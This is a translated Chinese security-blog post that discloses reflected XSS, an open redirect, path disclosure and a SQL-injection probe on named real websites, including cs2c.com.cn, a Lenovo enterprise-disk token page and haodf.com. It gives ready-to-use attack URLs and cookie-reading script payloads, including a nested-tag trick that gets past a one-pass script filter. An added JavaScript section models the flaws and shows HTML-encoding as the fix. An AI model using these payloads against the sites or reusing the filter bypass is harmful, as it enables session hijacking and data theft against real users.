Author: www.anying.org. Please credit the source when reposting.
A few XSS findings.
Zhongbiao Software (cs2c.com.cn) XSS (the company develops a domestic Chinese Linux, yet its own website is not secure)
1: http://www.cs2c.com.cn/search.php?searchword=<iframe src=http://www.baidu.com>&submit=+
First, enter a marker string of our own choosing (aaaaaaaaaaaa) in the search box and look at the page source:
<TR><TD align=left style="font-size:14px;font-weight:bold;text-align:center;border-bottom:1px dashed #ccc;">Searching for <span style="color:#FF0000">aaaaaaaaaaaa</span> found the following information:</TD></TR>
Look, our aaaaaaaaaaaa is echoed straight back into the page.
Let's test whether anything is filtered by searching for <>!@#$%^&*():
<TR><TD align=left style="font-size:14px;font-weight:bold;text-align:center;border-bottom:1px dashed #ccc;">Searching for <span style="color:#FF0000"><>!@#$%^&*()</span> found the following information:</TD></TR>
Look, no filtering at all; every character comes back unchanged.
Since the input lands in a text node, not an attribute, we can enter XSS code directly (the iframe in the URL above).
2:
http://neocertify.cs2c.com.cn/display/webSoftIndex.do?channelId=71
Search the page source for our marker to see where our input ends up:
<form id="myForm" action="/display/webQueryCompatible.do"><input type="hidden" id="keyword" name="keyword" value="aaaaaaaaaaa" /><input type="hidden" id="companyId" name="companyId" value="" />
Look! Our aaaaaaaaaaa is there, but inside an <input>, as the value attribute, so it is not rendered as HTML. Think about it: what if we enter "/> ?
Bingo!
The " closes the attribute value and the /> closes the <input> tag.
So what does that give us?
Anything we append after it is no longer inside the attribute, so the XSS code we put there is parsed and executed as ordinary HTML.
Enter in the search box:
"/><iframe src=http://www.baidu.com>
"/><script>alert(document.cookie)</script>
Zhongbiao Software path disclosure
http://www.cs2c.com.cn/index.php?id=117%20-1
I won't go into the path.
Lenovo Enterprise Network Disk reflected XSS
https://token.vips100.com/checkAccessCode.php?code=%22/%3E<iframe%20src=http://www.baidu.com>&sec=true
Same old method: search the page source for our string of aaaaaaaaa:
<input type="hidden" name="code" value="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" />
<input type="hidden" name="sec" value="" />
How about that? Looks very familiar.
OK, we close the tag:
Enter "/>
We can see that our string has been output.
Now we enter <script>
Hmm...
Our <script> seems to be filtered:
<input type="hidden" name="code" value="" />"/>
<input type="hidden" name="sec" value="" />
No hurry. Once we know how the filter behaves we can construct a bypass.
Let's enter <scr<script>ipt> and see.
View the source:
<input type="hidden" name="code" value="" /><script>"/>
<input type="hidden" name="sec" value="" />
OK. The filter deletes the literal <script> only once and does not re-scan the result, so the inner <script> is removed and the outer pieces join up into a fresh <script>. Let's try grabbing the cookie. Enter:
"/><scr<script>ipt>alert(document.cookie)</scr<script>ipt>//
An iframe works the same way.
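The following is an added example, not code from the original post or from any of the sites it discusses. It models the two reflection points walked through above (input echoed as text inside a <span> on the cs2c search page, and input echoed inside a hidden <input value="..."> on neocertify and vips100) together with the naive "delete <script>" filter whose behaviour was observed, and puts the proper fix (HTML-encoding the value) beside it. The templates, the filter function and the small tag tokenizer are assumptions made for illustration; nothing here is the real server code.

```javascript
// Added example: model of the reflection points and filter described in the post.
// Templates and filter are assumed for illustration, not the real server code.

// Reflection point 1: text node inside a span, no encoding at all.
function renderSearchSpan(term) {
  return 'Searching for <span style="color:#FF0000">' + term + '</span> found the following:';
}

// Reflection point 2: hidden input, value dropped straight into the attribute.
function renderHiddenInput(name, value) {
  return '<input type="hidden" name="' + name + '" value="' + value + '" />';
}

// Assumed filter modelled on what the post saw: every literal <script> or
// </script> is deleted once, with no second pass over the result.
function naiveScriptFilter(input) {
  return input.replace(/<\/?script>/gi, '');
}

// The actual fix: HTML-encode before placing data in an attribute (or text
// node). A quote can then never end the attribute and < can never open a tag.
function escapeHtml(input) {
  return String(input)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Stand-in for "view the page source": a small tokenizer that reports which
// tags a browser would see. It honours quoted attribute values, so a < inside
// value="..." does not count as a tag, but one that lands after "/> does.
function listTagNames(markup) {
  const names = [];
  let i = 0;
  while (i < markup.length) {
    if (markup[i] !== '<') { i++; continue; }
    let j = i + 1;
    let name = '';
    if (markup[j] === '/') { name = '/'; j++; }
    while (j < markup.length && /[A-Za-z0-9]/.test(markup[j])) {
      name += markup[j].toLowerCase();
      j++;
    }
    if (name === '' || name === '/') { i++; continue; } // bare '<' is text, not a tag
    names.push(name);
    let quote = null; // skip to the end of the tag, respecting quoted attributes
    while (j < markup.length) {
      const ch = markup[j];
      if (quote) { if (ch === quote) quote = null; }
      else if (ch === '"' || ch === "'") quote = ch;
      else if (ch === '>') break;
      j++;
    }
    i = j + 1;
  }
  return names;
}

// Payloads from the post.
const PAYLOAD_IFRAME = '<iframe src=http://www.baidu.com>';
const PAYLOAD_BREAKOUT = '"/><script>alert(document.cookie)</script>';
const PAYLOAD_NESTED = '"/><scr<script>ipt>alert(document.cookie)</scr<script>ipt>//';

// The three server behaviours side by side.
function reflectUnfiltered(input) { return renderHiddenInput('code', input); }
function reflectNaive(input) { return renderHiddenInput('code', naiveScriptFilter(input)); }
function reflectSafe(input) { return renderHiddenInput('code', escapeHtml(input)); }

// Quick demonstration when run directly with node.
if (typeof require !== 'undefined' && require.main === module) {
  console.log(listTagNames(renderSearchSpan(PAYLOAD_IFRAME)));   // span, iframe, /span
  console.log(listTagNames(reflectUnfiltered('<>!@#$%^&*()')));  // input (still inside the attribute)
  console.log(listTagNames(reflectNaive(PAYLOAD_BREAKOUT)));     // input (filter caught it)
  console.log(listTagNames(reflectNaive(PAYLOAD_NESTED)));       // input, script, /script
  console.log(listTagNames(reflectSafe(PAYLOAD_NESTED)));        // input
}
```

The tokenizer output is the point: the same <>!@#$%^&*() that proves "no filtering" on the search page is harmless while it stays inside a quoted attribute, which is why the hidden-input cases need the "/> breakout first; and the nested <scr<script>ipt> survives the one-pass filter because the deletion itself assembles a new <script>. Only the encoded version keeps the input inside the attribute regardless of payload.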
Haodf.com URL redirect
http://www.haodf.com/msg.php?msg=&url=http://www.baidu.com
Haodf.com XSS
http://www.haodf.com/msg.php?msg=<script>alert(document.cookie)</script>
This one does no filtering at all.
Enter the XSS code directly.
One more:
An SQL injection was found while verifying the XSS target.
http://neocertify.cs2c.com.cn/di... d=100&newsId=36
and 1=1 / and 1=2
But I could not dump the tables. I don't know why; maybe the dictionary isn't strong enough.